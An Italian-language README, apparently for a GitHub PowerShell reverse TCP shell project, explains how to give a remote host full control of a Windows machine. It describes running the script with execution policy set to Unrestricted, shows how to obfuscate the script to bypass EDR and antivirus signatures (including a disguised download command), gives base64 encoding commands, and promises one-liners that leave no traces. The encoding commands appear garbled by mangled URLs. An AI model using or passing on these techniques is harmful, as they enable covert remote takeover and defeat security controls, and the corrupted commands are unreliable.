
Script PowerShell per comunicare con un host remoto.
Script PowerShell per comunicare con un host remoto.
L'host remoto avrà il pieno controllo sul client e su tutti i comandi di sistema sottostanti.
Controlla le shell basate su:
Testato con PowerShell v5.1.19041.2673 su Windows 10 Enterprise OS (64-bit).
Realizzato a scopo educativo. Spero possa essere d'aiuto!
Questo repository ha iniziato ad avere firme note e non ho tempo di caricare nuovi script ogni volta, quindi dovresti offuscare questi script da solo.
Piani futuri:
Modifica l'indirizzo IP e il numero di porta all'interno degli script secondo necessità.
Apri PowerShell da \src\invoke_expression\original\ o \src\process_pipes\original\ ed esegui i comandi mostrati di seguito.
Imposta i criteri di esecuzione:```pwsh Set-ExecutionPolicy Unrestricted
Esegui lo script:```pwsh
.\powershell_reverse_tcp.ps1
Oppure, esegui il seguente comando da PowerShell o dal Prompt dei comandi:```pwsh PowerShell -ExecutionPolicy Unrestricted -File .\powershell_reverse_tcp.ps1
## Obfuscazione degli Script PowerShell
Cerca di bypassare EDR e altri meccanismi di sicurezza offuscando i tuoi script. Puoi vedere tali offuscamenti negli esempi seguenti.
Comando PowerShell originale:```pwsh
(New-Object Net.WebClient).DownloadFile($url, $out)
Comando PowerShell offuscato:```pwsh
& (GCM *ke-E*) '(& (GCM ew-O) NET.WEBCLIENT)."DOWNLOADFIL`E"($url, $out)'
**Controlla lo script PowerShell originale [qui](https://github.com/ivan-sincek/powershell-reverse-tcp/blob/master/src/invoke_expression/original/powershell_reverse_tcp.ps1) e quello completamente offuscato [qui](https://github.com/ivan-sincek/powershell-reverse-tcp/blob/master/src/invoke_expression/obfuscated/invoke_obfuscation/powershell_reverse_tcp_obfuscated.ps1).**
Dopo l'[offuscamento manuale](https://github.com/ivan-sincek/powershell-reverse-tcp/blob/master/src/invoke_expression/obfuscated/powershell_reverse_tcp_manual.ps1), lo script PowerShell originale è stato offuscato con [Invoke-Obfuscation](https://github.com/danielbohannon/Invoke-Obfuscation). Crediti all'autore!
Cerca su Internet tecniche e metodi di offuscamento aggiuntivi.
P.S. Poiché PowerShell viene costantemente aggiornato, alcune espressioni regolari (ad es. `*ke-E*`) potrebbero iniziare a generare eccezioni a causa di più metodi che corrispondono alla stessa espressione, quindi le espressioni dovranno essere specificate un po' meglio.
### Comando PowerShell Codificato
Per generare un comando PowerShell codificato da uno script PowerShell, esegui il seguente comando PowerShell:```pwsh
[Convert]:https://raw.githubusercontent.com/ivan-sincek/powershell-reverse-tcp/master/:ToBase64String(%5BText.Encoding%5D::Unicode.GetBytes(%5BIO.File%5D::ReadAllText($script)))
Per decodificare un comando PowerShell codificato, esegui il seguente comando PowerShell:```pwsh [Text.Encoding]:https://raw.githubusercontent.com/ivan-sincek/powershell-reverse-tcp/master/:Unicode.GetString(%5BConvert%5D::FromBase64String($command))
Usa i one-liner qui sotto se non vuoi lasciare tracce.
---